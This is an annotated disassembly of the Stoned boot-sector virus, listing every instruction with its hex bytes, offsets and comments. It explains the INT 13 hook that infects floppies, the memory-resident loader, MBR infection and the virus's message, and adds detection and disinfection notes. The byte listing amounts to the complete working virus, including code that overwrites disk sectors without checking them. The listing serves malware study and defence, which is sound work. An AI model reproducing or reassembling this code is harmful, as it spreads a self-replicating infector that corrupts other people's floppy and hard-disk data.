;STONED PC COMPUTER VIRUS
;Disassembled by Chris Cantrell 1990
; Listing format: offset: hex-bytes mnemonic ; comment. A "$" prefix means hexadecimal.
; 16-bit real-mode x86; offsets are relative to the segment the virus is running in
; (07C0 at boot, later the resident segment). The "*n" markers appear to be footnote
; references whose notes are not part of this section.
; Start
; Entry point at 07C0:0000 (physical 7C00), where the BIOS loads the sector. The first
; instruction is a far jump so that CS is forced to 07C0: the CS-relative references
; below ([CS:$0008], [CS:$0009], [CS:$000D], [CS:$0011]) only find this data area if
; CS really is 07C0, whatever CS:IP the BIOS happened to enter with.
0000: EA 05 00 C0 07 JMP $07C0:$0005 ; *1 Far jump to the next instruction with CS = 07C0
; (07C0 is the segment the boot sector is
; loaded in; this only re-orients CS).
0005: E9 99 00 JMP $00A1 ; *2 Skip the data area and the resident code; run the loader
; Data area. Patched at run time by the loader ($00AC-$00C6) and by the infection code
; ($014E / $0159); the infected sector carries these bytes to disk as-is.
0008: 00 ; Media source of this copy: 0 = written to a floppy, 2 = written to a fixed-disk MBR.
; Offs Seg
0009: 00 00 00 00 ; Original INT 13 vector (offset, segment) - filled in by the loader at $00AC-$00B5
000D: E4 00 00 00 ; Far pointer to the resident copy's continuation ($00E4); segment filled in at $00C6
0011: 00 7C 00 00 ; Far pointer 0000:7C00 - where the original boot sector is read back to and jumped to
;-----------------------------------------------------------------
; Infector
;-----------------------------------------------------------------
; New INT 13 handler, installed by the loader at $00C9-$00CF. Runs on the caller's
; stack and DS; CS = resident segment. Only AH=2 (read) or AH=3 (write) on DL=0 (A:)
; trigger an infection attempt, and then only when A:'s motor is not already running.
; Everything else is chained straight to the saved original vector.
; Detection note: after boot the INT 13 vector points to offset $0015 in a segment at the
; very top of conventional memory (see $00C4-$00CF) instead of into the BIOS.
0015: 1E PUSH DS ; Hold ...
0016: 50 PUSH AX ; ... incoming parameters
0017: 80 FC 02 CMP AH,$02 ; Is this a READ SECTOR request?
001A: 72 17 JB $0033 ; AH < 2: ignore, pass through untouched ...
001C: 80 FC 04 CMP AH,$04 ; ... only ...
001F: 73 12 JNB $0033 ; ... READ = 2 or WRITE = 3 are of interest ...
0021: 0A D2 OR DL,DL ; ... and only on drive 0 ...
0023: 75 0E JNZ $0033 ; ... (floppy A:). Fixed disks are never touched from here.
0025: 33 C0 XOR AX,AX ; DS = 0000 ...
0027: 8E D8 MOV DS,AX ; ... to reach the BIOS data area
; Throttle: bit 0 of the BIOS floppy motor-status byte (0000:043F) is set while A:'s motor
; is running. The first request of a burst finds it clear; the following ones find it set
; and are skipped, so the extra boot-sector read/write happens once per burst rather than
; on every sector (which would slow floppy access noticeably and draw attention).
0029: A0 3F 04 MOV AL,[DS:$043F] ; Floppy motor status byte
002C: A8 01 TEST AL,$01 ; Drive A: motor already on?
002E: 75 03 JNZ $0033 ; Yes ... don't do anything
0030: E8 07 00 CALL $003A ; Try to infect A: (preserves BX-DI and ES; AX, DS, flags are clobbered)
0033: 58 POP AX ; Restore original ...
0034: 1F POP DS ; ... incoming parameters
0035: 2E FF 2E 09 00 JMP FAR [CS:$0009] ; Chain to the original INT 13, which returns to the caller
;
; Try to infect Drive A (called from the INT 13 hook). On entry CS = resident segment,
; DS = 0000. Uses CS:$0200 (the 512 bytes after the virus image) as a sector buffer.
; Saves/restores BX, CX, DX, ES, SI, DI; AX, DS and flags are clobbered (the hook
; restores AX and DS itself).
;
003A: 53 PUSH BX ; Save all ...
003B: 51 PUSH CX ; ...
003C: 52 PUSH DX ; ...
003D: 06 PUSH ES ; ...
003E: 56 PUSH SI ; ...
003F: 57 PUSH DI ; ... registers
0040: BE 04 00 MOV SI,$0004 ; Up to 4 attempts at reading (motor spin-up)
0043: B8 01 02 MOV AX,$0201 ; Read one sector
0046: 0E PUSH CS ; Set ES to point ...
0047: 07 POP ES ; ... to code segment
0048: BB 00 02 MOV BX,$0200 ; Buffer just past the virus image
004B: 33 C9 XOR CX,CX ; Cyl 0 ...
004D: 89 CA MOV DX,CX ; Head 0, Drive 0 (A:)
004F: 41 INC CX ; ... Sector 1 (CL = 1; CH/cylinder stays 0): the boot sector
0050: 9C PUSHF ; *4 PUSHF + CALL FAR builds the stack frame an INT would, so the
0051: 2E FF 1E 09 00 CALL FAR [CS:$0009] ; original handler's IRET returns here. Read the boot sector.
0056: 73 0E JNB $0066 ; CF clear = success ... move on.
0058: 33 C0 XOR AX,AX ; AH = 0: reset disk system
005A: 9C PUSHF ; As if an interrupt
005B: 2E FF 1E 09 00 CALL FAR [CS:$0009] ; Reset drive via the original INT 13
0060: 4E DEC SI ; All attempts tried?
0061: 75 E0 JNZ $0043 ; No ... keep trying
0063: EB 35 JMP $009A ; Couldn't read A: ... give up silently
0065: 90 NOP ; Assembler fill
;
; The drive is responding and its boot sector is at CS:$0200. "Already infected" is decided
; by comparing only the first two words (4 bytes, EA 05 00 C0 - the far jump) of the virus
; with the sector: any boot sector that starts with those 4 bytes is left alone.
0066: 33 F6 XOR SI,SI ; Virus starting point
0068: BF 00 02 MOV DI,$0200 ; Just-read boot sector
006B: FC CLD ; Moving forward
006C: 0E PUSH CS ; Set DS to ...
006D: 1F POP DS ; ... code segment
006E: AD LODSW ; First word of virus
006F: 3B 05 CMP AX,[DI] ; Looks the same as boot sector?
0071: 75 06 JNZ $0079 ; No ... we need to infect
0073: AD LODSW ; Compare second words to be sure
0074: 3B 45 02 CMP AX,[DI+$02] ; Looks the same?
0077: 74 21 JZ $009A ; Yes ... already infected
;
; Not infected: stash the original boot sector at cyl 0, head 1, sector 3, then overwrite
; sector 1 with the virus image. The hold sector is chosen blindly - there is no check that
; 0/1/3 is free, so whatever the diskette format keeps there (presumably FAT or root-directory
; data, depending on the format) is destroyed.
0079: B8 01 03 MOV AX,$0301 ; Write one sector
007C: BB 00 02 MOV BX,$0200 ; Point to original boot
007F: B1 03 MOV CL,$03 ; *5 Cyl 0, Sec 3
0081: B6 01 MOV DH,$01 ; Head 1, Drive 0
0083: 9C PUSHF ; Set stack as if an interrupt
0084: 2E FF 1E 09 00 CALL [CS:$0009] ; Hold original boot sector (far call: same FF 1E encoding as at $0051)
0089: 72 0F JB $009A ; Error ... out of here (boot sector left untouched)
008B: B8 01 03 MOV AX,$0301 ; Write one sector
008E: 33 DB XOR BX,BX ; From ES:0000 = virus image; bytes $01B8-$01FF are whatever the
; resident segment holds there (the loader copies only $01B8 bytes)
0090: B1 01 MOV CL,$01 ; Sector 1
0092: 33 D2 XOR DX,DX ; Head 0, Drive 0
0094: 9C PUSHF ; As if an interrupt
0095: 2E FF 1E 09 00 CALL FAR [CS:$0009] ; Write virus to the boot sector. Result is not checked.
;
; Restore registers and return to the hook, which then passes the caller's original request on.
009A: 5F POP DI ; Restore all ...
009B: 5E POP SI ; ...
009C: 07 POP ES ; ...
009D: 5A POP DX ; ...
009E: 59 POP CX ; ...
009F: 5B POP BX ; ... Registers
00A0: C3 RET ; Done
;-----------------------------------------------------------------
; Loader
;-----------------------------------------------------------------
; Executes on bootup, still at 07C0:00A1 in the BIOS boot buffer. Takes 2 KB off the top of
; conventional memory (BIOS base-memory count at 0000:0413), copies the virus there, hooks
; INT 13 at the copy and jumps into it. The 2 KB drop in reported base memory is a
; practical tell for the resident copy.
00A1: 33 C0 XOR AX,AX ; Set DS to ...
00A3: 8E D8 MOV DS,AX ; ... segment 0000 (interrupt vectors + BIOS data area)
00A5: FA CLI ; No interrupts while SS:SP is being switched
00A6: 8E D0 MOV SS,AX ; Set a temporary ...
00A8: BC 00 7C MOV SP,$7C00 ; ... stack, growing down from just below the boot sector
00AB: FB STI ; Interrupts can happen now
00AC: A1 4C 00 MOV AX,[DS:$004C] ; Save ...
00AF: A3 09 7C MOV [DS:$7C09],AX ; ... original ... (0000:7C09 = 07C0:0009, the data area)
00B2: A1 4E 00 MOV AX,[DS:$004E] ; ... INT 13 ...
00B5: A3 0B 7C MOV [DS:$7C0B],AX ; ... vector (offset at 0:004C, segment at 0:004E).
00B8: A1 13 04 MOV AX,[DS:$0413] ; *6 BIOS count of conventional memory in KB
00BB: 48 DEC AX ; Reserve ...
00BC: 48 DEC AX ; ... 2K for virus (and its sector buffer)
00BD: A3 13 04 MOV [DS:$0413],AX ; Publish the reduced count so the OS is expected to leave the top 2K alone
00C0: B1 06 MOV CL,$06 ; Convert K byte number ...
00C2: D3 E0 SHL AX,CL ; ... to segment address (KB * 64 paragraphs)
00C4: 8E C0 MOV ES,AX ; MOVSB destination: virus segment
00C6: A3 0F 7C MOV [DS:$7C0F],AX ; Segment word of the $000D far pointer (its offset is already $00E4)
00C9: B8 15 00 MOV AX,$0015 ; Offset of the new INT 13 handler
00CC: A3 4C 00 MOV [DS:$004C],AX ; New INT13 offset ...
00CF: 8C 06 4E 00 MOV [DS:$004E],ES ; ... and segment. INT 13 is hooked from here on.
00D3: B9 B8 01 MOV CX,$01B8 ; Bytes in virus (code + strings, $0000-$01B7); $01B8-$01FF are not copied
00D6: 0E PUSH CS ; DS points to ...
00D7: 1F POP DS ; ... segment with virus code
00D8: 33 F6 XOR SI,SI ; Offsets are both ...
00DA: 8B FE MOV DI,SI ; ... zero
00DC: FC CLD ; Moving forward
00DD: F3 A4 REPZ MOVSB ; Copy the virus into its segment at the top of memory
00DF: 2E FF 2E 0D 00 JMP FAR [CS:$000D] ; Continue at $00E4 in the new segment
; (pointer patched at $00C6 above).
;
; From here the virus runs in its 2K home at the top of RAM (CS = resident segment).
; The INT 13 hook is already installed, so every INT $13 below passes through $0015 first.
00E4: B8 00 00 MOV AX,$0000 ; AH = 0: reset disk system (DL is whatever the BIOS left in it)
00E7: CD 13 INT $13 ; Disk now ready
00E9: 33 C0 XOR AX,AX ; Set ES to ...
00EB: 8E C0 MOV ES,AX ; ... segment 0000
00ED: B8 01 02 MOV AX,$0201 ; Read 1 sector
00F0: BB 00 7C MOV BX,$7C00 ; ... into 0000:7C00, where the BIOS originally put this sector
00F3: 2E803E0800 00 CMP BYTE PTR [CS:$0008],$00 ; *7 Media flag: 0 = this copy was booted from a floppy
00F9: 74 0B JZ $0106 ; Floppy ... use the floppy hold sector (0/1/3)
00FB: B9 07 00 MOV CX,$0007 ; Cyl 0, Sec 7
00FE: BA 80 00 MOV DX,$0080 ; Head 0, Drive 80h (first fixed disk)
0101: CD 13 INT $13 ; Fetch the original MBR from its hold sector
0103: EB 49 JMP $014E ; Straight on to it: no message, no re-infection, and - unlike the
; floppy path at $010E - no CF check, so a failed read still jumps to 0000:7C00.
0105: 90 NOP ; Assembler fill
;
; Booted from a floppy: load its original boot sector, maybe print the message, then look
; at the first fixed disk.
0106: B9 03 00 MOV CX,$0003 ; Cyl 0, Sec 3
0109: BA 00 01 MOV DX,$0100 ; Head 1, Drive 0 (A:) - the floppy hold sector written at $0079
010C: CD 13 INT $13 ; Load the original boot sector to 0000:7C00
010E: 72 3E JB $014E ; Error -- nothing we can do (jumps to whatever is at 7C00)
0110: 26F6066C0407 TEST BYTE PTR [ES:$046C],$07 ; *8 Low 3 bits of the BIOS timer tick count (ES = 0) as a cheap random
0116: 75 12 JNZ $012A ; Skip the message 7/8 of the time
;
; About 1 boot in 8 from an infected floppy prints the message. This happens before, and
; independently of, the hard-disk check at $012A - it is not tied to hard-disk infection.
0118: BE 89 01 MOV SI,$0189 ; Message (NUL-terminated, see $0189)
011B: 0E PUSH CS ; Set DS ...
011C: 1F POP DS ; ... to virus segment
011D: AC LODSB ; Get byte in message
011E: 0A C0 OR AL,AL ; NUL terminator reached?
0120: 74 08 JZ $012A ; Yes ... done with message
0122: B4 0E MOV AH,$0E ; INT 10 teletype output
0124: B7 00 MOV BH,$00 ; Display page 0 (BH is the page number for AH=0Eh)
0126: CD 10 INT $10 ; Print character
0128: EB F3 JMP $011D ; Do all characters
;
; Floppy boot continues: read the first fixed disk's MBR into the resident buffer and see
; whether it already starts with the virus' first 4 bytes (same weak check as at $006E).
012A: 0E PUSH CS ; Set ES ...
012B: 07 POP ES ; ... to CS
012C: B8 01 02 MOV AX,$0201 ; Read the current MBR of drive 80h
012F: BB 00 02 MOV BX,$0200 ; Buffer after virus
0132: B1 01 MOV CL,$01 ; Cyl = 0 (CH still 0), Sec = 1
0134: BA 80 00 MOV DX,$0080 ; Head = 0, Drive = 80h
0137: CD 13 INT $13 ; Read current boot sector
0139: 72 13 JB $014E ; Error (e.g. no fixed disk) ... skip it
013B: 0E PUSH CS ; Set DS ...
013C: 1F POP DS ; ... to CS
013D: BE 00 02 MOV SI,$0200 ; Current boot sector data
0140: BF 00 00 MOV DI,$0000 ; Virus data
0143: AD LODSW ; Get first word of boot sector
0144: 3B 05 CMP AX,[DI] ; Same as virus?
0146: 75 11 JNZ $0159 ; No ... infect it
0148: AD LODSW ; Yes ... try second word
0149: 3B 45 02 CMP AX,[DI+$02] ; Boot sector looks like virus?
014C: 75 0B JNZ $0159 ; No ... infect it
;
; Common exit for every path. Clear the media flag in the resident copy so that the copies
; the INT 13 hook writes to floppies carry media = 0 (and so take the floppy path when
; booted), then hand over to the original boot sector / MBR now sitting at 0000:7C00.
014E: 2E C6 06 08 00 00 MOV BYTE PTR [CS:$0008],$00 ; Media type = floppy.
0154: 2E FF 2E 11 00 JMP [CS:$0011] ; Far jump to 0000:7C00 (same FF 2E encoding as at $00DF)
;
; Infect the first fixed disk (drive 80h).
0159: 2E C6 06 08 00 02 MOV BYTE PTR [CS:$0008],$02 ; Media flag = 2 so the on-disk copy knows it lives in an MBR
015F: B8 01 03 MOV AX,$0301 ; Write 1 sector
0162: BB 00 02 MOV BX,$0200 ; Original MBR (as read at $0137)
0165: B9 07 00 MOV CX,$0007 ; Cyl = 0, Sec = 7
0168: BA 80 00 MOV DX,$0080 ; Head = 0, Drive = 80h
016B: CD 13 INT $13 ; Stash the original MBR at 0/0/7 (track 0, before the first partition -
; not the FAT). Whatever was at 0/0/7 is overwritten without any check. Disinfection
; amounts to copying 0/0/7 back over 0/0/1, provided nothing else has touched it since.
016D: 72 DF JB $014E ; Error ... out of here (media flag is reset to 0 at $014E)
;
; Carry the partition table across. The MBR is a single 512-byte sector whose bytes
; $01BE-$01FF hold the four 16-byte partition entries followed by the 2-byte boot
; signature. The sector read at $0137 sits at CS:$0200, so its table is at CS:$03BE; it is
; copied to $01BE of the virus image (CS:$0000), which is then written back as the new MBR.
; The count $0242 is $0200 bytes more than the 66 ($42) needed: the surplus is copied from
; $0400-$05FF into $0200-$03FF (the read buffer, already written to disk at $016B) and
; never reaches the disk, because the write below is exactly one sector from offset 0.
016F: 0E PUSH CS ; Set DS ...
0170: 1F POP DS ; ... to CS
0171: 0E PUSH CS ; Set ES ...
0172: 07 POP ES ; ... to CS
0173: BE BE 03 MOV SI,$03BE ; Source: partition table in the read-in MBR ($0200 + $01BE)
0176: BF BE 01 MOV DI,$01BE ; Destination: same offset in the virus image
0179: B9 42 02 MOV CX,$0242 ; 64-byte table + 2-byte signature ($42) plus $0200 bytes of harmless overrun
017C: F3 A4 REPZ MOVSB ; Forward copy; src > dst so the overlap is safe. Leaves CX = 0.
017E: B8 01 03 MOV AX,$0301 ; Write one sector
0181: 33 DB XOR BX,BX ; From ES:0000 = virus image with the copied partition table
0183: FE C1 INC CL ; CX was 0 after the MOVSB: Cyl = 0, Sec = 1
0185: CD 13 INT $13 ; Write the infected MBR. DX is not reloaded (relies on 0080h surviving
; the INT 13 at $016B); the result is not checked.
0187: EB C5 JMP $014E ; Clear the media flag and continue with the original boot sector
; StonedMessage - printed by the loop at $011D, which stops at the $00 at $01A4.
; $07,'Your PC is now STONED!',$07,$0d,$0a,$0a,$00   ($07 is BEL; presumably the INT 10
; teletype call sounds the speaker for it, so the message comes with two beeps)
0189: 07 59 6F 75
018D: 72 20 50
0190: 43 20 69
0193: 73 20 6E
0196: 6F
0197: 77 20 53
019A: 54 4F 4E
019D: 45
019E: 44 21 07
01A1: 0D 0A 0A 00
; Carried in the sector but never referenced by any code in this listing (no CR/LF and no
; terminator). It ends at $01B7, which is why the loader copies exactly $01B8 bytes.
; 'LEGALISE MARIJUANA!'
01A5: 4C 45 47 41
01A9: 4C 49 53
01AC: 45 20 4D 41
01B0: 52 49 4A
01B3: 55 41 4E 41 21